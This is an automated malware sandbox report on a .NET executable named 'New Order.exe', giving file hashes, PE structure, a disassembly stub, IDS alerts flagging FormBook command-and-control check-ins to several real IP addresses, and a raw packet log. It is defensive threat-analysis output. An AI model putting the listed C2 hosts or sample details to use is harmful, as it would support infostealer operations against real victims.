                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Entropy (8bit):7.80512033123719
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                            File name:New Order.exe
                                                                                                                            File size:764'928 bytes
                                                                                                                            MD5:8ef36959a2cedc10c4c6036c2360e105
                                                                                                                            SHA1:96c17b47e3bbcd645fdf24b3a7b3319848fb62ed
                                                                                                                            SHA256:c8e6b3d94513f697d73e00d43476dddd0abdaf8d5cc6954a1218571dbccec61e
                                                                                                                            SHA512:e29fd3578698f5092c74d5a4d1fb46507baaa09b5a0360d08ef02e67bcca7aa41318be0ba6bb30a81216e4c05ed7bdee45500fe346a13d60debeb76516256035
                                                                                                                            SSDEEP:12288:tIR4R52J+Xtwg8SONPyA3RQgiP9nBdQyPieztFKN0fpEzPjQT12Yi2ktQfj9qI5w:tIeeCY5hvyPicFruzP8T1pipaf8I4
                                                                                                                            TLSH:90F4124C1A5BE817CB8657340EB2F2B8167C2FDEE90092178FCDADEBF9399245E44185
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....pNg..............0..T...T......Rp... ........@.. ....................................@................................
                                                                                                                            Icon Hash:033424c4c199d839
                                                                                                                            Entrypoint:0x4b7052
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x674E70A1 [Tue Dec 3 02:44:49 2024 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7000 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x4ca8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xb5058 | 0xb5400 | 189765fb2ee49f09b810dd6cfecc9f8a | False | 0.9382933728448276 | data | 7.814379411138541 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb8000 | 0x4ca8 | 0x5000 | 843f3f08b881443c15ddd37cb4735d13 | False | 0.917626953125 | data | 7.667289957031235 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xbe000 | 0xc | 0x400 | e618e9f8eb8329922a32cb78cce734df | False | 0.025390625 | data | 0.05585530805374581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xb8100 | 0x46f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9932852661126094 |
| RT_GROUP_ICON | 0xbc80c | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xbc830 | 0x278 | data | | | 0.4699367088607595 |
| RT_MANIFEST | 0xbcab8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-03T14:38:32.568418+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49830 | 13.248.169.48 | 80 | TCP |
| 2024-12-03T14:38:32.568418+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49830 | 13.248.169.48 | 80 | TCP |
| 2024-12-03T14:38:50.059697+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49870 | 154.90.35.240 | 80 | TCP |
| 2024-12-03T14:38:52.731586+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49876 | 154.90.35.240 | 80 | TCP |
| 2024-12-03T14:38:55.403519+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49883 | 154.90.35.240 | 80 | TCP |
| 2024-12-03T14:38:58.419961+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49889 | 154.90.35.240 | 80 | TCP |
| 2024-12-03T14:38:58.419961+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49889 | 154.90.35.240 | 80 | TCP |
| 2024-12-03T14:39:05.373364+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49907 | 162.0.213.94 | 80 | TCP |
| 2024-12-03T14:39:07.975620+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49916 | 162.0.213.94 | 80 | TCP |
| 2024-12-03T14:39:10.678060+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49922 | 162.0.213.94 | 80 | TCP |
| 2024-12-03T14:39:13.325867+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49928 | 162.0.213.94 | 80 | TCP |
| 2024-12-03T14:39:13.325867+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49928 | 162.0.213.94 | 80 | TCP |
| 2024-12-03T14:39:20.607420+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49946 | 68.66.226.92 | 80 | TCP |
| 2024-12-03T14:39:23.283014+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49953 | 68.66.226.92 | 80 | TCP |
| 2024-12-03T14:39:25.939581+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49960 | 68.66.226.92 | 80 | TCP |
| 2024-12-03T14:39:28.655512+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49965 | 68.66.226.92 | 80 | TCP |
| 2024-12-03T14:39:28.655512+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49965 | 68.66.226.92 | 80 | TCP |
| 2024-12-03T14:39:35.823243+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49981 | 31.31.196.17 | 80 | TCP |
| 2024-12-03T14:39:38.497451+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49987 | 31.31.196.17 | 80 | TCP |
| 2024-12-03T14:39:41.282174+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49993 | 31.31.196.17 | 80 | TCP |
| 2024-12-03T14:39:43.826177+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50000 | 31.31.196.17 | 80 | TCP |
| 2024-12-03T14:39:43.826177+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50000 | 31.31.196.17 | 80 | TCP |
| 2024-12-03T14:39:51.245387+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50020 | 130.185.109.77 | 80 | TCP |
| 2024-12-03T14:39:53.834742+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50026 | 130.185.109.77 | 80 | TCP |
| 2024-12-03T14:39:56.580474+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50033 | 130.185.109.77 | 80 | TCP |
| 2024-12-03T14:39:59.181051+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50034 | 130.185.109.77 | 80 | TCP |
| 2024-12-03T14:39:59.181051+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50034 | 130.185.109.77 | 80 | TCP |
| 2024-12-03T14:40:09.460333+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50035 | 172.104.82.74 | 80 | TCP |
| 2024-12-03T14:40:12.133262+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50036 | 172.104.82.74 | 80 | TCP |
| 2024-12-03T14:40:14.950707+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50037 | 172.104.82.74 | 80 | TCP |
| 2024-12-03T14:40:17.522871+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50038 | 172.104.82.74 | 80 | TCP |
| 2024-12-03T14:40:17.522871+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50038 | 172.104.82.74 | 80 | TCP |
| 2024-12-03T14:40:24.558464+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50039 | 208.91.197.27 | 80 | TCP |
| 2024-12-03T14:40:27.217634+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50040 | 208.91.197.27 | 80 | TCP |
| 2024-12-03T14:40:29.803948+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50041 | 208.91.197.27 | 80 | TCP |
| 2024-12-03T14:40:33.049521+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50042 | 208.91.197.27 | 80 | TCP |
| 2024-12-03T14:40:33.049521+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50042 | 208.91.197.27 | 80 | TCP |
| 2024-12-03T14:40:40.658339+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50043 | 154.23.184.95 | 80 | TCP |
| 2024-12-03T14:40:43.325961+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50044 | 154.23.184.95 | 80 | TCP |
| 2024-12-03T14:40:45.997652+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50045 | 154.23.184.95 | 80 | TCP |
| 2024-12-03T14:40:48.765760+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50046 | 154.23.184.95 | 80 | TCP |
| 2024-12-03T14:40:48.765760+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50046 | 154.23.184.95 | 80 | TCP |
| 2024-12-03T14:40:55.729618+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50047 | 172.104.18.233 | 80 | TCP |
| 2024-12-03T14:40:58.365545+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50048 | 172.104.18.233 | 80 | TCP |
| 2024-12-03T14:41:01.169543+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50049 | 172.104.18.233 | 80 | TCP |
| 2024-12-03T14:41:03.845046+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50050 | 172.104.18.233 | 80 | TCP |
| 2024-12-03T14:41:03.845046+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50050 | 172.104.18.233 | 80 | TCP |
| 2024-12-03T14:41:11.120114+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50052 | 173.236.199.97 | 80 | TCP |
| 2024-12-03T14:41:13.842276+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50053 | 173.236.199.97 | 80 | TCP |
| 2024-12-03T14:41:16.416218+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50054 | 173.236.199.97 | 80 | TCP |
| 2024-12-03T14:41:19.134440+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50055 | 173.236.199.97 | 80 | TCP |
| 2024-12-03T14:41:19.134440+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50055 | 173.236.199.97 | 80 | TCP |
| 2024-12-03T14:41:26.888257+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50056 | 85.159.66.93 | 80 | TCP |
| 2024-12-03T14:41:29.560132+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50057 | 85.159.66.93 | 80 | TCP |
| 2024-12-03T14:41:32.232129+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50058 | 85.159.66.93 | 80 | TCP |
| 2024-12-03T14:41:34.704363+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50059 | 85.159.66.93 | 80 | TCP |
| 2024-12-03T14:41:34.704363+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 50059 | 85.159.66.93 | 80 | TCP |
| 2024-12-03T14:41:51.013348+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50060 | 154.70.82.246 | 80 | TCP |
| 2024-12-03T14:41:55.487978+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 50061 | 154.70.82.246 | 80 | TCP |

                                                                                                                            Dec 3, 2024 14:38:51.200483084 CET8049876154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:51.200577974 CET4987680192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:51.216475010 CET4987680192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:51.337771893 CET8049876154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:52.731585979 CET4987680192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:52.855032921 CET8049876154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:52.855125904 CET4987680192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:53.751060963 CET4988380192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:53.871260881 CET8049883154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:53.871371031 CET4988380192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:53.897022009 CET4988380192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:54.017333984 CET8049883154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:54.017350912 CET8049883154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:55.403518915 CET4988380192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:55.524308920 CET8049883154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:55.524391890 CET4988380192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:56.422401905 CET4988980192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:56.542499065 CET8049889154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:56.542680025 CET4988980192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:56.553672075 CET4988980192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:56.674776077 CET8049889154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:58.419655085 CET8049889154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:58.419821024 CET8049889154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:58.419960976 CET4988980192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:58.422933102 CET4988980192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:58.542964935 CET8049889154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:03.917500019 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:04.037640095 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:04.037727118 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:04.053203106 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:04.173197031 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373219967 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373302937 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373321056 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373363972 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.373498917 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373543024 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373569965 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373581886 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373590946 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.373625040 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.374119997 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.374170065 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.374237061 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.374391079 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.374430895 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.493640900 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.493715048 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.493803978 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.497605085 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.546094894 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.571007013 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.583853960 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.583914995 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.584021091 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.584125042 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.586432934 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.586502075 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:06.579389095 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:06.699434042 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:06.699537992 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:06.715790987 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:06.835930109 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975531101 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975573063 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975588083 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975620031 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:07.975733042 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975747108 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975758076 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975797892 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:07.975955963 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.976114988 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.976126909 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.976170063 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:07.976305962 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.976378918 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:08.095854044 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.095899105 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.095980883 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:08.099980116 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.099992037 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.100056887 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:08.176652908 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.176692009 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.176768064 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:08.179326057 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.179388046 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:08.232121944 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:09.250837088 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:09.370929956 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:09.371021986 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:09.390208006 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:09.510238886 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:09.510286093 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.677865982 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.677980900 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.677992105 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678060055 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.678219080 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678234100 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678278923 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.678416014 CET8049922162.0.213.94192.168.2.6
